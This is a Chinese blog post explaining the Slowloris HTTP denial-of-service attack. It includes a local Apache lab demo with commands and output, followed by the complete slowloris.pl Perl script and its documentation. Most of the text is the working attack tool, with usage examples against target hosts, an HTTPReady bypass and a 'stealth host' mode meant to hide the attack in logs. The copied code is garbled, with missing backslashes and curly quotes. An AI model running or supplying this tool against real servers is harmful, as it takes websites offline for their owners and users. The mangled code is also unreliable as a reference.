原文地址:浅谈Slowloris拒绝服务攻击 作者:xcgsnowdrop
DDOS又称为分布式拒绝服务,全称是Distributed Denial of Service。DDOS本是利用合理的请求造成资源过载,导致服务不可用。比如一个停车场共有100车位,当100车位都停满后,再有车想要停进来,就必须等待已有的车先出去才行。如果已有的车一直不出去,那么停车场的入口就会排气长队,停车场的负荷过载,不能正常工作了,这种情况就是“拒绝服务”。
常见的DDOS攻击有SYN flood、UDP flood、ICMP flood等。其中SYN flood是一种最为经典的DDOS攻击。其利用的是TCP协议设计中的缺陷,此处先避开不谈。
Slowloris攻击则是利用Web Server的漏洞或设计缺陷,直接造成拒绝服务。下面通过一个典型示例分析slowloris的拒绝服务攻击本质。
Slowloris是在2009年由著名Web安全专家RSnake提出的一种攻击方法,其原理是以极低的速度往服务器发送HTTP请求。由于Web Server对于并发的连接数都有一定的上限,因此若是恶意地占用住这些连接不释放,那么Web Server的所有连接都将被恶意连接占用,从而无法接受新的请求,导致拒绝服务。
要保持住这个连接,RSnake构造了一个畸形的HTTP请求,准确地说,是一个不完整的HTTP请求。
GET / HTTP/1.1\r\n
HOST: host\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n
Content-Length: 42\r\n
在正常的HTTP包头中,是以两个CLRF表示HTTP Headers部分结束的。
由于Web Server只收到了一个\r\n,因此将认为HTTP Headers部分没有结束,并保持此连接不释放,继续等待完整的请求。此时客户端再发送任意HTTP头,保持住连接即可。
X-a: b\r\n
当构造多个连接后,服务器的连接数很快就会达到上限。在Slowloris的专题网站上可以下载到POC演示程序,其核心代码置于文章底部,记为slowloris.pl),下面开始使用该脚本工具演示如何使用slowloris攻击使Web Server拒绝服务:
一,准备工作
1.在本机安装配置好Apache2.x,设置MaxClients为50
2.在Browser中访问http://127.0.0.1,结果显示正常
3.下载或编写slowloris.pl脚本
二,开始阶段
1.测试每个http连接等待超时时间,前面我们说过,当Web Server只收到了一个\r\n时,因将其认为HTTP Headers部分尚未结束,故会保持此连接不释放,继续等待完整的请求,此处测试的即为该连接等待完整请求的超时时间。
perl slowloris.pl -dns 127.0.0.1 -port 80 -test
Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
This test could take up to 14.3666666666667 minutes.
Connection successful, now comes the waiting game…
Trying a 2 second delay:
Worked.
Trying a 30 second delay:
Worked.
Trying a 90 second delay:
Worked.
Trying a 240 second delay:
Worked.
……
注:若该等待超时时间太小(<166),则使用slowloris对该目标进行攻击可能会出现麻烦
2.正式开始发送不完整请求,攻击Web Server使其拒绝服务。注:因此处我们已将Apache的MaxClients设置为50,故此处使用100个不完整连接已足够。
perl slowloris.pl -dns 127.0.0.1 -port 80 -timeout 200 -num 100
Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
Connecting to 127.0.0.1:80 every 200 seconds with 100 sockets:
Building sockets.
Building sockets.
Sending data.
Current stats: Slowloris has now sent 294 packets successfully.
This thread now sleeping for 200 seconds…
Sending data.
……
三,验证结果
使用chrome或firefox并打开其debug工具,继续访问http://127.0.0.1,则可发型在HttpRequest发出去后,HttpResponse一直没有收到,出于等待状态。
总结:在该案例中,“有限”的资源是Web Server的连接数。这是一个有上限的值,比如在Apache中这个值由MaxClients定义。如果恶意客户端可以无限制地将连接数占满,就完成了对有限资源的恶意消耗,导致拒绝服务。
在Slowloris发布之前,也曾有人意识到这一问题,但Apache官方否认Slowloris的攻击方式是一个漏洞,他们认为这是Web Server的一种特性,通过调整参数能够缓解此类问题,这使得Slowloris攻击今天仍然很有效。
【注:本文引用了“白帽子讲Web安全”部分定义内容,slowloris脚本则在网络上有成熟和一直在维护的版本下载】
点击(此处)折叠或打开
- #!/usr/bin/perl -w
- use strict;
- use IO::Socket::INET;
- use IO::Socket::SSL;
- use Getopt::Long;
- use Config;
- $SIG{‘PIPE’} = ‘IGNORE’; #Ignore broken pipe errors
- my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
- my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
- my $result = GetOptions(
- ‘shost=s’ => $shost,
- ‘dns=s’ => $host,
- ‘httpready’ => $httpready,
- ‘num=i’ => $connections,
- ‘cache’ => $cache,
- ‘port=i’ => $port,
- ‘https’ => $ssl,
- ‘tcpto=i’ => $tcpto,
- ‘test’ => $test,
- ‘timeout=i’ => $timeout,
- ‘version’ => $version,
- );
- if ($version) {
- print “Version 0.7n”;
- exit;
- }
- unless ($host) {
- print “Usage:nntperl $0 -dns [www.example.com] -optionsn”;
- print “ntType ‘perldoc $0’ for help with options.nn”;
- exit;
- }
- unless ($port) {
- $port = 80;
- print “Defaulting to port 80.n”;
- }
- unless ($tcpto) {
- $tcpto = 5;
- print “Defaulting to a 5 second tcp connection timeout.n”;
- }
- unless ($test) {
- unless ($timeout) {
- $timeout = 100;
- print “Defaulting to a 100 second re-try timeout.n”;
- }
- unless ($connections) {
- $connections = 1000;
- print “Defaulting to 1000 connections.n”;
- }
- }
- my $usemultithreading = 0;
- if ( $Config{usethreads} ) {
- print “Multithreading enabled.n”;
- $usemultithreading = 1;
- use threads;
- use threads::shared;
- }
- else {
- print “No multithreading capabilites found!n”;
- print “Slowloris will be slower than normal as a result.n”;
- }
- my $packetcount : shared = 0;
- my $failed : shared = 0;
- my $connectioncount : shared = 0;
- srand() if ($cache);
- if ($shost) {
- $sendhost = $shost;
- }
- else {
- $sendhost = $host;
- }
- if ($httpready) {
- $method = “POST”;
- }
- else {
- $method = “GET”;
- }
- if ($test) {
- my @times = ( “2”, “30”, “90”, “240”, “500” );
- my $totaltime = 0;
- foreach (@times) {
- $totaltime = $totaltime + $_;
- }
- $totaltime = $totaltime / 60;
- print “This test could take up to $totaltime minutes.n”;
- my $delay = 0;
- my $working = 0;
- my $sock;
- if ($ssl) {
- if (
- $sock = new IO::Socket::SSL(
- PeerAddr => “$host”,
- PeerPort => “$port”,
- Timeout => “$tcpto”,
- Proto => “tcp”,
- )
- )
- {
- $working = 1;
- }
- }
- else {
- if (
- $sock = new IO::Socket::INET(
- PeerAddr => “$host”,
- PeerPort => “$port”,
- Timeout => “$tcpto”,
- Proto => “tcp”,
- )
- )
- {
- $working = 1;
- }
- }
- if ($working) {
- if ($cache) {
- $rand = “?” . int( rand(99999999999999) );
- }
- else {
- $rand = “”;
- }
- my $primarypayload =
- “GET /$rand HTTP/1.1rn”
- . “Host: $sendhostrn”
- . “User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)rn”
- . “Content-Length: 42rn”;
- if ( print $sock $primarypayload ) {
- print “Connection successful, now comes the waiting game…n”;
- }
- else {
- “That’s odd – I connected but couldn’t send the data to $host:$port.n”;
- print “Is something wrong?nDying.n”;
- exit;
- }
- }
- else {
- print “Uhm… I can’t connect to $host:$port.n”;
- print “Is something wrong?nDying.n”;
- exit;
- }
- for ( my $i = 0 ; $i <= $#times ; $i++ ) {
- print “Trying a $times[$i] second delay: n”;
- sleep( $times[$i] );
- if ( print $sock “X-a: brn” ) {
- print “tWorked.n”;
- $delay = $times[$i];
- }
- else {
- if ( $SIG{__WARN__} ) {
- $delay = $times[ $i – 1 ];
- last;
- }
- print “tFailed after $times[$i] seconds.n”;
- }
- }
- if ( print $sock “Connection: Closernrn” ) {
- print “Okay that’s enough time. Slowloris closed the socket.n”;
- print “Use $delay seconds for -timeout.n”;
- exit;
- }
- else {
- print “Remote server closed socket.n”;
- print “Use $delay seconds for -timeout.n”;
- exit;
- }
- if ( $delay < 166 ) {
- print <<EOSUCKS2BU;
- Since the timeout ended up being so small ($delay seconds) and it generally
- takes between 200-500 threads for most servers and assuming any latency at
- all… you might have trouble using Slowloris against this target. You can
- tweak the -timeout flag down to less than 10 seconds but it still may not
- build the sockets in time.
- EOSUCKS2BU
- }
- }
- else {
- “Connecting to $host:$port every $timeout seconds with $connections sockets:n”;
- if ($usemultithreading) {
- domultithreading($connections);
- }
- else {
- doconnections( $connections, $usemultithreading );
- }
- }
- sub doconnections {
- my ( $num, $usemultithreading ) = @_;
- my ( @first, @sock, @working );
- my $failedconnections = 0;
- $working[$_] = 0 foreach ( 1 .. $num ); #initializing
- $first[$_] = 0 foreach ( 1 .. $num ); #initializing
- while (1) {
- $failedconnections = 0;
- print “ttBuilding sockets.n”;
- foreach my $z ( 1 .. $num ) {
- if ( $working[$z] == 0 ) {
- if ($ssl) {
- if (
- $sock[$z] = new IO::Socket::SSL(
- PeerAddr => “$host”,
- PeerPort => “$port”,
- Timeout => “$tcpto”,
- Proto => “tcp”,
- )
- )
- {
- $working[$z] = 1;
- }
- else {
- $working[$z] = 0;
- }
- }
- else {
- if (
- $sock[$z] = new IO::Socket::INET(
- PeerAddr => “$host”,
- PeerPort => “$port”,
- Timeout => “$tcpto”,
- Proto => “tcp”,
- )
- )
- {
- $working[$z] = 1;
- $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
- }
- else {
- $working[$z] = 0;
- }
- }
- if ( $working[$z] == 1 ) {
- if ($cache) {
- $rand = “?” . int( rand(99999999999999) );
- }
- else {
- $rand = “”;
- }
- my $primarypayload =
- “$method /$rand HTTP/1.1rn”
- . “Host: $sendhostrn”
- . “User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)rn”
- . “Content-Length: 42rn”;
- my $handle = $sock[$z];
- if ($handle) {
- print $handle “$primarypayload”;
- if ( $SIG{__WARN__} ) {
- $working[$z] = 0;
- close $handle;
- $failed++;
- $failedconnections++;
- }
- else {
- $packetcount++;
- $working[$z] = 1;
- }
- }
- else {
- $working[$z] = 0;
- $failed++;
- $failedconnections++;
- }
- }
- else {
- $working[$z] = 0;
- $failed++;
- $failedconnections++;
- }
- }
- }
- print “ttSending data.n”;
- foreach my $z ( 1 .. $num ) {
- if ( $working[$z] == 1 ) {
- if ( $sock[$z] ) {
- my $handle = $sock[$z];
- if ( print $handle “X-a: brn” ) {
- $working[$z] = 1;
- $packetcount++;
- }
- else {
- $working[$z] = 0;
- #debugging info
- $failed++;
- $failedconnections++;
- }
- }
- else {
- $working[$z] = 0;
- #debugging info
- $failed++;
- $failedconnections++;
- }
- }
- }
- “Current stats:tSlowloris has now sent $packetcount packets successfully.nThis thread now sleeping for $timeout seconds…nn”;
- sleep($timeout);
- }
- }
- sub domultithreading {
- my ($num) = @_;
- my @thrs;
- my $i = 0;
- my $connectionsperthread = 50;
- while ( $i < $num ) {
- $thrs[$i] =
- threads->create( &doconnections, $connectionsperthread, 1 );
- $i += $connectionsperthread;
- }
- my @threadslist = threads->list();
- while ( $#threadslist > 0 ) {
- $failed = 0;
- }
- }
- __END__
- =head1 TITLE
- Slowloris
- =head1 VERSION
- Version 0.7 Beta
- =head1 DATE
- 06/17/2009
- =head1 AUTHOR
- RSnake <h@ckers.org> with threading from John Kinsella
- =head1 ABSTRACT
- Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on thetarget server, so other vital processes don’t die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
- =head1 AFFECTS
- Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others…?
- =head1 NOT AFFECTED
- IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others…?
- =head1 DESCRIPTION
- Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it’sthreads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
- As a side note, Slowloris does not consume a lot of resources so modern operating systems don’t have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
- =head2 Testing
- If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
- =head3 Testing Example:
- ./slowloris.pl -dns www.example.com -port 80 -test
- This won’t give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn’t suggest that unless you know what you’re doing).
- =head2 HTTP DoS
- Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that theserver has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available – this would be solved by threading, but that’s for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it’s successful or not though.
- =head3 HTTP DoS Example:
- ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
- =head2 HTTPReady Bypass
- HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
- =head3 HTTPReady Bypass Example
- ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
- =head2 Stealth Host DoS
- If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
- =head3 Stealth Host DoS Example:
- ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
- =head2 HTTPS DoS
- Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
- =head3 HTTPS DoS Example:
- ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
- =head2 HTTP Cache
- Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
- =head3 HTTP Cache Example:
- ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
- =head1 Issues
- Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it’s current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won’t be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
- Slowloris isn’t completely quiet either, because it can’t be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it’s not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files – although you may have trouble taking down a larger site with just one machine, depending on their architecture.
- For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it’s probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can’t open any more ports than ~130 or so on any server you test – you’re probably running into this “feature” of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
- Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it’s logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won’t be in the logs, but once the sockets close you’ll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point – although the DoS will be over by that point too.
- =head1 What is a slow loris?
- What exactly is a slow loris? It’s an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
- http://www.youtube.com/watch?v=rLdQ3UhLoD4